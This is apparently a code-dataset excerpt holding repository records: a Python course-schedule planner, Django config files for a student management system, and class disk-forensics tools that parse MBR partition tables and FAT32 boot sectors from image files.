self.__get_courses()\n self.__fetch_schedule()\n\n # create a list to store all combination\n courseAndIndex = []\n for course in self.__courses:\n courseAndIndex.append(\n [i for i in range(len(course.get_course_schedule()))]\n )\n\n combinations = list(product(*courseAndIndex))\n\n # plan courses\n print(\"\\nPlanning your courses, please wait...\")\n self.__test_all_combinations(combinations)\n\n # save the result\n self.__save_result()\n\n def __get_courses(self):\n \"\"\"get the number of courses and corresponding course code(s)\"\"\"\n\n while True:\n try:\n numOfCourses = int(\n input(\"How many courses do you wanna take? > \")\n )\n if numOfCourses < 1:\n print(\"Please enter a number larger than 0\")\n else:\n break\n except ValueError:\n print(\"Please enter a valid number\")\n\n self.__courses = []\n\n for num in range(numOfCourses):\n courseCode = input(\"Input course code > \")\n self.__courses.append(Course(courseCode))\n print()\n\n def __fetch_schedule(self):\n \"\"\"fetch all the schedules\"\"\"\n\n for course in self.__courses:\n course.fetch_schedule()\n\n def __check_clash(self, time1, time2):\n \"\"\"simply check whether the schedules of two courses clash\"\"\"\n\n for i in range(120):\n # schedules clash when the bits at the same index is both 1\n if time1[i] == time2[i] == \"1\":\n return True\n else:\n continue\n return False\n\n def __combine_time(self, time1, time2):\n \"\"\"combine the schedules of two courses to\n form a new binary string containing schedule\n for both courses\n \"\"\"\n\n newTime = \"0\" * 120\n\n for i in range(120):\n if time1[i] == time2[i] == \"0\":\n continue\n else:\n newTime = newTime[:i] + \"1\" + newTime[i + 1:]\n\n return newTime\n\n def __test_all_combinations(self, combinations):\n \"\"\"test all possible combinations of indexs for clashing\"\"\"\n\n # create a bufferList to store every index\n # for every course in nested loops\n self.__bufferList = []\n for course in self.__courses:\n self.__bufferList.append(\n [index for index in course.get_course_schedule().keys()]\n )\n\n # make a copy of combinations to store the results\n self.__result = combinations[:]\n\n for combination in combinations:\n currentTime = \"0\" * 120\n for i in range(len(combination)):\n schedule = self.__courses[i].get_course_schedule()\n nextTime = schedule[self.__bufferList[i][combination[i]]]\n if self.__check_clash(currentTime, nextTime):\n self.__result.remove(combination)\n break\n else:\n currentTime = self.__combine_time(currentTime, nextTime)\n # if self.__meetsRequirement(currentTime):\n # continue\n # else:\n # self.result.remove(combination)\n # break\n\n def __meets_requirement(self, time):\n \"\"\"check whether a possible schedule meets my requirement\"\"\"\n\n for i in range(0, 120, 24):\n if \"1\" in time[i:i + 2]: # classes start after 9:30 am\n return False\n else:\n continue\n return True\n\n def __save_result(self):\n \"\"\"save all schedules that meet my requirement to a text file\"\"\"\n\n with open(\"result.txt\", \"w\") as finalResult:\n counter = 1\n finalResult.write(\"Possible choices(s):\\n\\n\")\n for combination in self.__result:\n finalResult.write(str(counter) + \":\\n\")\n counter += 1\n for i in range(len(combination)):\n finalResult.write(\n self.__courses[i].get_course_code().upper() +\n \": \" + self.__bufferList[i][combination[i]] +\n \"\\n\"\n )\n finalResult.write(\"\\n\")\n\n print(\"\\nResults have been saved to file 'result.txt'\")\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 18.600000381469727,
"blob_id": "37e859a0f1691c103a28a2f26de26cdba77b3ed8",
"content_id": "ed1bf84fd8285673a3598f12064a757b199a254f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 98,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 5,
"path": "/ntu_course_planner/config.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "def init(year, sem):\n global ACADYEAR\n global ACADSEM\n ACADYEAR = year\n ACADSEM = sem\n"
}
] | 10 |
dearcharlyn/student_management_system
|
https://github.com/dearcharlyn/student_management_system
|
94f1719eaa54097dd074e7981832be7d9b1f46fa
|
608dbdbeb2cd560663d57f0ea428e13e5a952fcc
|
af5b2c20960c0ad05c9e1a18d3a2500de79ee710
|
refs/heads/master
| 2023-06-13T00:29:26.976492 | 2021-06-29T07:56:42 | 2021-06-29T07:56:42 | 380,988,678 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5471698045730591,
"alphanum_fraction": 0.7358490824699402,
"avg_line_length": 16.66666603088379,
"blob_id": "c1855bed7315d86262803f7f5c94b37c26f21a35",
"content_id": "5d402f42e8aaaabeabd11415fd998dd6ee99c6bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "dearcharlyn/student_management_system",
"src_encoding": "UTF-8",
"text": "--find-links wheelhouse\nDjango==1.11.29\npytz==2021.1\n"
},
{
"alpha_fraction": 0.7307692170143127,
"alphanum_fraction": 0.7362637519836426,
"avg_line_length": 21.75,
"blob_id": "6c0fa530284e07fe64b092dc79904281137eb601",
"content_id": "b70e9a27224700c9e484500e446368bfac7109cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 8,
"path": "/student_management_app/apps.py",
"repo_name": "dearcharlyn/student_management_system",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.apps import AppConfig\n\n\nclass StudentManagementAppConfig(AppConfig):\n name = 'student_management_app'\n"
}
] | 2 |
bpsizemore/DiskForensics
|
https://github.com/bpsizemore/DiskForensics
|
9818e86dabd624a2dd4f8a8dd364f20c9488b7c0
|
1b779dd86cb75493efe699d982f7e7d43ca0261d
|
f993f725012fe464368a334300fddecdeca5df21
|
refs/heads/master
| 2020-05-27T03:10:19.915641 | 2017-11-09T16:52:15 | 2017-11-09T16:52:15 | 82,516,341 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5619886517524719,
"alphanum_fraction": 0.619257390499115,
"avg_line_length": 20.472972869873047,
"blob_id": "6312641398e25a7e362d734efec8f0ca1f190374",
"content_id": "36d3a6385229eafa6c13ae4e25fc372be27d7a29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1589,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 74,
"path": "/mbr.c",
"repo_name": "bpsizemore/DiskForensics",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n\ntypedef union {\n\tunsigned int ui;\n\tunsigned char b4;\n} Dword;\n\nvoid printPartInfo(unsigned char *part, int partNum)\n{\n\tprintf(\"Partition %d:\\n\", partNum);\n\tint i;\n\tfor (i=0; i<16; i++)\n\t{\n\t\tprintf(\"%02x\", part[i]);\n\t}\n\tprintf(\"\\n\");\n\n\tif (part[0] == 0x80){\n\t\tprintf(\"Bootable: true\\n\");\n\t} else {\n\t\tprintf(\"Bootable: false\\n\");\n\t}\n\n\t\t\n\tprintf(\"CHS value of first sector: %02x %02x %02x\\n\", part[1], part[2], part[3]);\n\tprintf(\"Partition type: %02x\\n\", part[4]);\n\tprintf(\"CHS value of last sector: %02x %02x %02x\\n\", part[5], part[6], part[7]);\n\tprintf(\"LBA of first sector: %02x %02x %02x %02x\\n\", part[8], part[9], part[10], part[11]);\n\t\n\tDword totalSectors = {part[12], part[13], part[14], part[15]};\n\tprintf(\"Total Number of Sectors: %u\\n\", totalSectors.ui);\n\tprintf(\"\\n\");\n}\n\nint main()\n{\n\tprintf(\"Partition Table:\\n\\n\");\n\tunsigned char sectorZero[512];\n\n\tFILE *image;\n\timage = fopen(\"sdb.mbr\", \"r\");\n\tfread(sectorZero, 1, 512, image);\n\n\tint x = 0;\n\tint i;\n\tunsigned char first[16];\n\tfor (i=0; i<16; i++) {\n\t\tfirst[i] = sectorZero[x+i];\n\t}\n\n\tx = 16; //beginning of second partition entry\n\tunsigned char second[16];\n\tfor (i=0; i<16; i++) {\n\t\tsecond[i] = sectorZero[x+i];\n\t}\n\n\tx = 32; //beginning of third partition entry\n\tunsigned char third[16];\n\tfor (i=0; i<16; i++) {\n\t\tthird[i] = sectorZero[x+i];\n\t}\n\n\tx = 48; //beginning of fourth partition entry\n\tunsigned char fourth[16];\n\tfor (i=0; i<16; i++) {\n\t\tfourth[i] = sectorZero[x+i];\n\t}\n\n\tprintPartInfo(first, 1);\n\tprintPartInfo(second, 2);\n\tprintPartInfo(third, 3);\n\tprintPartInfo(fourth, 4);\n}\n"
},
{
"alpha_fraction": 0.8051282167434692,
"alphanum_fraction": 0.8153846263885498,
"avg_line_length": 47.75,
"blob_id": "e3a3cb03b2ab56d0c9393265312b1772c8aa5d49",
"content_id": "c74d49030cd41d8a74c64af6bbe6d4d5a57b4680",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 195,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 4,
"path": "/README.md",
"repo_name": "bpsizemore/DiskForensics",
"src_encoding": "UTF-8",
"text": "# DiskForensics\nDisk Forensic Analysis Tools\n\nThese tools were written for a CPE class titled Digital Forensics. They can be used to extract partitions from an MBR and examine a FAT32 partition.\n"
},
{
"alpha_fraction": 0.5824840664863586,
"alphanum_fraction": 0.6337579488754272,
"avg_line_length": 28.037036895751953,
"blob_id": "e3e30f46b5bd7f385af597b53fda897b24ab4f6d",
"content_id": "83ebfc41fb4333e8ad6bbc09a99d997553116668",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3140,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 108,
"path": "/fat32.py",
"repo_name": "bpsizemore/DiskForensics",
"src_encoding": "UTF-8",
"text": "from tkinter import *\n\nroot = Tk()\nT = Text(root, height=30, width=100)\nT.pack()\n\ndef print_hex(d, s):\n print(d + ' '.join(map('{:02X}'.format, s)));\n\n\ndef print_dec(d, s):\n print(d + str(int.from_bytes(s, byteorder='little')))\n\n\ndef print_dir_entry(d, ):\n #print_hex('', d)\n if d[0] == 0x00: #If filename starts with 0x00 then then a file was never written there\n return\n\n elif d[0] == 0x05: #If file was previously deleted\n print(\"File previously deleted\")\n print()\n return\n elif d[0] == 0x41:\n #print(\"Extended filename entry\");\n #print();\n return\n\n T.insert(END, ('Filename: ' + str(d[0:8]) + '\\n'))\n #print_hex('', d)\n T.insert(END, (\"Starting cluster: \" + str(int.from_bytes(d[26:28], byteorder='little')) + '\\n'))\n T.insert(END, (\"Filesize in Bytes: \" + str(int.from_bytes(d[28:32], byteorder='little')) + '\\n'))\n\n # iterate through fat entries\n fat_cluster = int.from_bytes(d[26:28], byteorder='little')\n file_start = root_dir + (fat_cluster - 2) * 512 - 64\n print(fat_cluster)\n while fat_cluster != 0:\n contents = data[file_start:file_start+512]\n i = 0\n while i < 512 and contents[i] != 0x00:\n i = i + 1\n\n T.insert(END, 'File Contents: ' + str(contents[0:i]))\n\n fat_cluster = 0;\n T.insert(END, '\\n\\n')\n # while data[(fat_start_offset + 4 * fat_cluster + 2)] != 0xFF:\n # swap to next fat cluster num and do stuff\n # print()\n\nfat_partition = open(\"usb1.img\", \"rb\")\n\ndata = fat_partition.read()\njump_instruction = data[0:3]\noem_name = data[3:11]\nbytes_per_sector = data[11:13]\nsectors_per_cluster = data[13]\nreserved_sectors = data[14:16]\nnum_fats = data[16]\nmax_root_entries = data[17:19]\nsmall_sectors = data[19:21]\nmedia_type = data[21]\nsectors_per_fat = data[22:24]\nsectors_per_track = data[24:26]\nnum_heads = data[26:28]\nhidden_sectors = data[28:32]\nlarge_sectors = data[32:36]\ndisk_num = data[36]\ncurr_head = data[37] # not used in FAT\nex_sig = data[38]\nvolume_serial = data[39:43]\nvolume_label = data[43:54]\nsystem_id = data[54:62]\nsig = data[510:512]\nfat_start_offset = reserved_sectors * 512\n\n# found other document saying different info\n\nsectors_per_fat = data[36:40]\nroot_dir_first_cluster = data[44:48]\n\nprint_hex(\"Jump instruction: \", jump_instruction)\nprint('Oem_name: ' + str(oem_name))\nprint_dec('Bytes per sector: ', bytes_per_sector)\nprint('Sectors per cluster: ', sectors_per_cluster)\nprint_dec('Reserved sectors: ', reserved_sectors)\nprint('Number of FATs: ', num_fats)\nprint_dec('Maximum number of Root Entries: ', max_root_entries)\nprint_dec('Sectors per FAT: ', sectors_per_fat)\nprint_dec('Sectors per track: ', sectors_per_track)\nprint_dec('Hidden sectors: ', hidden_sectors)\nprint_dec('Total number of sectors: ', large_sectors)\nprint_hex('Signature: ', sig)\nprint_dec('Root Dir starts at sector: ', root_dir_first_cluster)\n\nroot_dir = (520*2 + 32)*512 + 64\nprint()\nT.insert(END, 'Directory listing follows... \\n\\n')\nprint()\nprint()\n\nx = 0;\nwhile data[root_dir+x] != 0x00:\n print_dir_entry(data[root_dir+x:root_dir+x+32])\n x = x + 32;\n\nmainloop()\n\n\n\n\n"
}
] | 3 |
pmpierremathis/Toolobx
|
https://github.com/pmpierremathis/Toolobx
|
d867faf97a627d1b744564e2ea4e1a4cd623617c
|
fcb41263a9f03205bb71ebc4b02812478c06b694
|
41652e11721048a34e2e4cde40c7ad30d67adc7a
|
refs/heads/master
| 2023-06-05T07:45:10.109681 | 2021-06-21T14:44:38 | 2021-06-21T14:44:38 | 378,928,689 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 21,
"blob_id": "8152efff1c54871d28433386986d131ab4861362",
"content_id": "8c1a3fa3908494bba5043b67411e4328d664272b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 4,
"path": "/tests/test_best.py",
"repo_name": "pmpierremathis/Toolobx",
"src_encoding": "UTF-8",
"text": "from toolobx.best import mean\n\ndef test_mean():\n assert type(mean([1,2,3])) is float"
},
{
"alpha_fraction": 0.5193798542022705,
"alphanum_fraction": 0.5426356792449951,
"avg_line_length": 20.66666603088379,
"blob_id": "89fa75cc32d5068274090fb3abcc8f3db65e7dd8",
"content_id": "7efea80a653dd582e7babec395441ce7f61017bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 6,
"path": "/toolobx/best.py",
"repo_name": "pmpierremathis/Toolobx",
"src_encoding": "UTF-8",
"text": "def mean(a_list):\n return sum(a_list) / len(a_list)\n\nif __name__ == \"__main__\":\n example = [1,2,3]\n print(mean(example))"
}
] | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.